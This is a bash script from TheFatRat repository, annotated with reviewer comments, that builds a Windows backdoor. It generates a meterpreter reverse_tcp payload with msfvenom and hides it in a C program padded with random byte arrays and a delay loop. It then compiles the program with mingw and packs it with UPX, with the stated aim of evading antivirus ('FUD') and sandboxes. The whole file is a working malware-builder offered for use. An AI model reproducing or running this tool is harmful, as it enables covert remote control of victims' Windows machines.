GitHub Repository: screetsec/TheFatRat
Path: blob/master/powerfull.sh
#!/bin/bash
# powerfull.sh — TheFatRat helper that wraps an msfvenom payload in a C program
# and cross-compiles it with mingw (see the build loop at the bottom).
# Inputs: config/config.path (tool/output paths, expected from setup.sh) and
#         the optional config/conf.def (LHOST/LPORT defaults).
# NOTE(review): both files are consumed by absolute line number with no
# validation — a shifted or hand-edited config silently yields wrong values.
file="config/config.path"
if [ -f "$file" ]
then
# Lines 13-17 of config.path; which line means what is fixed by setup.sh
# (not visible here). Line 17 ($output) is where the executables are written.
msfconsole=$(sed -n 13p ${file})
msfvenom=$(sed -n 14p ${file})
backdoor=$(sed -n 15p ${file})
searchsploit=$(sed -n 16p ${file})
output=$(sed -n 17p ${file})
else
echo "Configuration file does not exists , run setup.sh first ."
exit 1


fi
# Optional defaults: conf.def line 1 = LHOST, line 2 = LPORT. The path is
# resolved against the current working directory, not the script location.
path=`pwd`
defcon=$path/config/conf.def
if [ -f "$defcon" ]
then
yourip=`sed -n 1p $defcon`
yourport=`sed -n 2p $defcon`
fi

# Validate the LHOST/LPORT values the user supplied.
# Globals:  yourip, yourport, red, okegreen (read); err (written: 0 ok, 1 missing)
# Outputs:  error text to stdout
# Returns:  always 0 (last command is echo) — callers must inspect $err
# NOTE(review): despite the message text, the port is only checked for being
# non-empty; there is no 1-65535 range check and no IP/hostname syntax check.
# err is a global, not local, and is read by the caller after this returns.
function invalid1 ()
{
err=0
echo ""
if [ -z "$yourip" ]; then
echo -e $red ""
echo "[ ! ] You must write an IP or Hostname ."
echo -e $okegreen ""
echo "IP Example : 192.168.1.34
Domain Example : myhost.com"
err=1
fi
echo ""
if [ -z "$yourport" ]; then
echo -e $red ""
echo "[ ! ] You must write a port number between 1 & 65535 ."
err=1
fi
echo -e $okegreen ""
}

#get user local ip , public ip & hostname into variables
# NOTE(review): `ip addr` is parsed by line offset after the first 'state UP'
# match, so hosts with several interfaces or a different output layout give a
# wrong or empty address. The public-IP lookup is a DNS query to an external
# resolver (network egress at startup) and is used only for display.
lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
lanip6=`ip addr | grep 'state UP' -A4 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'`
# comp encodes which cross compilers were found:
#   "0" none, "1" i686 (mingw32) only, "2" x86_64 (mingw64) only, "3" both.
comp="0"
# Warn if the gcc-mingw32 package is not located here /usr/bin/i586-mingw32msvc-gcc
# You may need to install the following on Kali Linux to compile the C to an Exe - "apt-get install gcc-mingw32"
# check mingw if exists
which i686-w64-mingw32-gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]
then
echo []::[mingw32]: installation found!;
comp="1"
fi
which x86_64-w64-mingw32-gcc > /dev/null 2>&1
if [ $? -eq 0 ]
then
echo []::[mingw64]: installation found!;

if [ $comp == "0" ]
then
comp="2"
elif [ $comp == "1" ]
then
comp="3"
else
# NOTE(review): unreachable — comp can only be "0" or "1" at this point. When
# neither compiler is present, comp stays "0" and execution continues; nothing
# in this section aborts for the "no compiler" case.
echo [x]::[warning]:this script require mingw32 or mingw64 installed to work ;
echo ""
echo [!]::Run setup.sh to install mingw64 ;
sleep 2s
exit 1
fi
fi



# check upx if exists
# Unlike the compiler check, a missing upx is fatal here.
which upx > /dev/null 2>&1
if [ $? -eq 0 ]; then
echo []::[Upx]: installation found!;

else

echo [x]::[warning]:this script require upx to work ;
echo ""
echo [!]::Run setup.sh to install upx ;
echo ""
sleep 2s
exit 1
fi

###################################################################################################
# FatRat Coded By Screetsec ( Edo Maland )
# Program to create a C program after it is compiled that will bypass most AV
# Test in Kali Linux :)
# Very Slow to create Backdoor But Very powerfull for bypass AV
# Easy to Use
# FUD for popular Antivirus :)
# Dont Upload to virus total
####################################################################################################


#Checking
# Requires root. NOTE(review): it is not obvious from this script what needs
# root — the compile, upx and the writes to $output look user-level; confirm
# before keeping the check, since it runs the unquoted rm/mkdir paths below as root.
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
clear
# SERVICE is not referenced anywhere in the visible part of this script.
SERVICE=service;

#This colour
# ANSI escape sequences for 'echo -e'. 'yellow' is assigned twice with the
# same value; 'green' holds the blue code (34), not green.
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m'
yellow='\e[1;33m'
orange='\e[38;5;166m'

# Remove leftovers from a previous run so the build loop below starts fresh.
# NOTE(review): $output is unquoted here and in every later use; with a blank
# line 17 in config.path these operate on "/Powerfull.exe", and paths with
# spaces are split.
rm -f $output/Powerfull.exe >/dev/null 2>&1
rm -f $output/Powerfull-fud.exe >/dev/null 2>&1
#Banner
clear
echo
echo -e $yellow""
echo " =========================================================================="
echo -e $okegreen" FatRat Coded By Screetsec ( Edo -Maland- ) "
echo
echo -e $yellow" / __/ /__ _ __ / _ )__ __/ /_ / _ \___ _ _____ ____/ _/_ __/ / / "
echo " _\ \/ / _ \ |/|/ / / _ / // / __/ / ___/ _ \ |/|/ / -_) __/ _/ // / / / "
echo " /___/_/\___/__,__/ /____/\_,_/\__/ /_/ \___/__,__/\__/_/ /_/ \_,_/_/_/ "
echo""
echo -e $okegreen" This program compiles a C program with a meterpreter reverse_tcp payload "
echo " In it that can then be executed on a windows host "
echo " Program to create a C program after it is compiled that will bypass most AV "
echo -e $yellow" =========================================================================="
echo -e $okegreen""

#input lhost and lport
echo -e $okegreen""
echo -e $yellow "Your local IPV4 address is : $lanip"
echo -e $yellow "Your local IPV6 address is : $lanip6"
echo -e $yellow "Your public IP address is : $publicip"
echo -e $yellow "Your Hostname is : $hostn"
echo -e $okegreen ""
# If conf.def is absent, force a prompt for both values.
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
# invalid1 sets the global $err (1 = something missing); it does not exit.
invalid1
if [ $err == "1" ]
then
echo -e $okegreen ""
echo -n "Press any key to restart again ."
read inp
# NOTE(review): this runs a child copy of the script and then falls through —
# there is no exit, so when the child returns this run continues with the
# values that just failed validation.
./powerfull.sh
fi

echo ""
# Select the cross compiler from $comp (0 none, 1 mingw32, 2 mingw64, 3 both).
# NOTE(review): with comp="0" COMPILER is never assigned; the build loop further
# down then runs an empty command each pass, never produces $outputExe and so
# does not terminate.
if [ $comp == "1" ]
then
COMPILER="i686-w64-mingw32-gcc"
fi
if [ $comp == "2" ]
then
COMPILER="x86_64-w64-mingw32-gcc"
fi

# Both compilers present: let the user choose the target architecture.
if [ $comp == "3" ]
then
echo ""
echo -e $yellow "You can compile this FUD for 32bit or 64bit windows machines"
echo ""
echo -e $green "Choose one of the following options"
echo -e $orange "+-------------------------------+"
echo -e $orange "|$white [$green 1$white ] $yellow Compile 32bit FUD Exe $orange |"
echo -e $orange "|$white [$green 2$white ] $yellow Compile 64bit FUD Exe $orange |"
echo -e $orange "+-------------------------------+"
echo ""
echo -ne $green "Choose (1 or 2) : " ;tput sgr0
read archs
case $archs in
1)
COMPILER="i686-w64-mingw32-gcc"
echo ""
echo -e $green "32bit Selected"
sleep 1
;;
2)
COMPILER="x86_64-w64-mingw32-gcc"
echo ""
echo -e $green "64bit Selected"
sleep 1
;;
*)
# NOTE(review): the message says 32bit but this assigns the 64-bit compiler.
COMPILER="x86_64-w64-mingw32-gcc"
echo ""
echo -e $green "Invalid Option , setting 32bit as default"
sleep 1
;;
esac
fi
echo -e $okegreen
# msfvenom arguments used by the build loop.
payload="windows/meterpreter/reverse_tcp"
msfvenomBadChars="\x00\xff"
msfvenomEncoder="x86/shikata_ga_nai"
msfvenomIterations="3" # Recommended value: 3

randomness=3517 # The higher the randomness the more padding is added to the c program increasing the binaries size
delayRandomness=32676 # The higher the delay the longer it will take to execute the payload, may increase your chances of escaping a sandbox

#Set directory
# Output goes to $output (from config.path); the generated C source is written
# next to the script in the current working directory.
currentDir=`pwd`
outputDir="$output/"
outputExe="${outputDir}Powerfull.exe" # You can change the name of the executable on this line
outputUPX="${outputDir}Powerfull-fud.exe" # You can change the name of the executable on this line

cProg="${currentDir}/prog.c"
cProgTemp="${currentDir}/prog.c.temp"

# Create some padding to be compiled in the C program this adds randomness to the binary
# Earlier variant; not called anywhere in the visible part of this script
# (generatePadding below is the one used).
# Globals: randomness, cProg (read); counter and the random* variables are
#          written as globals (no 'local').
# Effect:  appends a random count of 'unsigned char <name>[]="...";' lines to $cProg.
function old_generatePadding {

counter=0
randomNumber=$((RANDOM%${randomness}+7))
while [ $counter -lt $randomNumber ]; do
echo "" >> $cProg
randomCharnameSize=$((RANDOM%5+12))
randomPaddingSize=$((RANDOM%1024+2048))
randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c ${randomPaddingSize}`
echo "unsigned char ${randomCharname}[]=\"$randomPadding\";" >> $cProg
let counter=counter+1
done
}

# Padding generator used by the build loop. Appends to $cProg a random number of
# 'unsigned char <name>[]=' declarations, each made of several string-literal
# lines of "\xHH" escapes; the last line of each carries the terminating ';'.
# Globals: randomness, cProg (read); paddingArray, counter and every loop
#          variable (c, d, random*) are written as globals (no 'local').
function generatePadding {

paddingArray=(0 1 2 3 4 5 6 7 8 9 a b c d e f)

counter=0
randomNumber=$((RANDOM%${randomness}+23))
while [ $counter -lt $randomNumber ]; do
echo "" >> $cProg
randomCharnameSize=$((RANDOM%10+7))
randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
echo "unsigned char ${randomCharname}[]=" >> $cProg
randomLines=$((RANDOM%20+13))
for (( c=1; c<=$randomLines; c++ ))
do
randomString="\""
randomLength=$((RANDOM%11+7))
for (( d=1; d<=$randomLength; d++ ))
do
randomChar1=${paddingArray[$((RANDOM%15))]}
randomChar2=${paddingArray[$((RANDOM%15))]}
randomPadding=$randomChar1$randomChar2
randomString="$randomString\\x$randomPadding"
done
randomString="$randomString\""
if [ $c -eq ${randomLines} ]; then
echo "$randomString;" >> $cProg
else
echo $randomString >> $cProg
fi
done
let counter=counter+1
done
}


# Check to see the output directory exists
# NOTE(review): $outputDir is quoted in the test but not in the mkdir.
if [[ ! -d "$outputDir" ]]; then
mkdir $outputDir
fi

echo ""
echo "You may see multiple errors until the executable is compiled successfully."
echo ""
# NOTE(review): inside [[ ]] '>' is a string comparison, not numeric; it only
# happens to behave for single-digit values.
if [[ $msfvenomIterations > 3 ]]; then
echo "Most of the errors are due to the msfvenom iterations value is set too high."
echo "Recommended value: msfvenomIterations=3"
fi
echo ""

# Check to see if the executable was previously created
# (The two rm -f calls near the top already removed it, so this is not expected
# to trigger in a normal run.)
if [[ -f "$outputExe" ]]; then
echo "Remove the executable at ${outputExe} to recreate it."
echo ""
fi


sleep 2


# Until the Powerfull.exe is compiled successfully loop until it is
# Each pass rebuilds prog.c from scratch: padding, main() with a nested
# busy-wait loop, the msfvenom '-f c' output (assumed by this script to define
# an array named 'buf'), a call into that array, more padding. There is no
# retry limit — if $COMPILER is unset or $msfvenom keeps failing, this loop
# never exits.
while [[ ! -f "$outputExe" ]]; do

# Delete the c program and recreate it
rm -f $cProg

generatePadding

echo "" >> $cProg
echo "int main(void)" >> $cProg
echo "{" >> $cProg

# Introduce a couple of processing loops for a delay
echo "" >> $cProg
echo "int zewd5 = 1, rqs3 = 1;" >> $cProg
echo "for ( zewd5 = 1 ; zewd5 <= ${delayRandomness} ; zewd5++ )" >> $cProg
echo " for ( rqs3 = 1 ; rqs3 <= ${delayRandomness} ; rqs3++ )" >> $cProg
echo " {}" >> $cProg
echo "" >> $cProg

generatePadding

echo "" >> $cProg
# LHOST/LPORT come straight from conf.def or the prompt; invalid1 only checked
# that they are non-empty, and they are expanded unquoted here.
$msfvenom -p ${payload} LHOST=$yourip LPORT=$yourport -b ${msfvenomBadChars} -e ${msfvenomEncoder} -i ${msfvenomIterations} -f c >> $cProg

generatePadding

echo "" >> $cProg
echo "((void (*)())buf)();" >> $cProg
echo "" >> $cProg

generatePadding

echo "" >> $cProg
echo "}" >> $cProg

# Rename the payload array. sed replaces every 'buf' substring in the file,
# including any that happen to occur inside generated identifiers.
randomBufNameSize=$((RANDOM%10+23))
randomBufName=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomBufNameSize}`
cat $cProg | sed "s/buf/${randomBufName}/g" > $cProgTemp
mv -f $cProgTemp $cProg
# To install the following program on Kali Linux - "apt-get install gcc-mingw32"
# NOTE(review): prog.c is only removed at the start of a pass, never after this
# step, so the generated source (payload included) stays in $currentDir.
$COMPILER -o $outputExe $cProg

done
# NOTE(review): the loop above exits only once $outputExe exists, so the
# "Unable to compile backdoor" branch is unreachable.
if [[ -f "$outputExe" ]]
then
echo "Uncompressed backdoor created in : $outputExe"
else
echo "Unable to compile backdoor"
echo -n "Press Enter to return to menu"
read rsp
exit 0
fi
echo ""
echo -n "Compressing $outputExe with UPX to be less detectable ...."
# Use UPX to create a second executable, testing...
# upx output and exit status are discarded; success is judged only by whether
# $outputUPX exists afterwards.
upx -q --ultra-brute -o $outputUPX $outputExe >/dev/null 2>&1
echo "Done"

# Both branches exit 0, so a caller cannot tell a failed UPX step from success.
if [[ -f "$outputUPX" ]]
then
echo "Compressed Backdoor was build in : $outputUPX"
echo ""
echo -n "Press Enter to return to fatrat menu"
read rsp
exit 0
else
echo "Unable to compress $outputExe with UPX"
echo -n "Press Enter to return to fatrat menu"
read rsp
exit 0
fi
